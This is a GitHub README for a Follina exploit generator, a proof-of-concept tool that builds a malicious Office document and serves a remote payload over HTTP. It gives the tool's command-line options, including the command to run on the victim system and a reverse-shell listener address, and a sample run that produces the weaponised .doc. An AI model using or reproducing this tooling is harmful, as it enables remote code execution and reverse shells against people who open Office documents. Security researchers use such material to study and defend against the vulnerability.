Skip to content

Latest commit

 

History

History
50 lines (39 loc) · 1.51 KB

README.md

File metadata and controls

50 lines (39 loc) · 1.51 KB

Follina Exploit

Follina PoC Exploit Generator!

Usage

$ ./follina_exploit.py --help
usage: follina_exploit.py [-h] [-c COMMAND] [-o OUTPUT] [-i IP] [-p PORT]
                          [-r LHOST:LPORT]

[+] Exploit Generator for Follina

options:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        Command to execute on the remote system [Default:
                        Calc]
  -o OUTPUT, --output OUTPUT
                        Name of output malicious Doc [Default: exploit.doc]
  -i IP, --ip IP        Interface to bind http server to [Default: 127.0.0.1]
  -p PORT, --port PORT  Port to start http server on [Default: 6969]
  -r LHOST:LPORT, --reverse LHOST:LPORT
                        IP and Port for reverse shell
$ ./follina_exploit.py
⚙ Output File: exploit.doc
⚙ Starting HTTP Server over: 127.0.0.1:6969
⚙ Command: calc.exe
📁 Staging Folder: /tmp/follina_fu9t5t6p
🐞 Wrote payload to /tmp/follina_fu9t5t6p/www/index.html
🔥 Preparing Malicious doc
🌐 Serving /tmp/follina_fu9t5t6p/www over http://127.0.0.1:6969
✔ Created Malicios Doc: /home/whokilleddb/Code/Follina/exploit.doc

To-Do

  • Change the document to RTF form

Works On

  • Office 19
  • Office 16 (probably)

References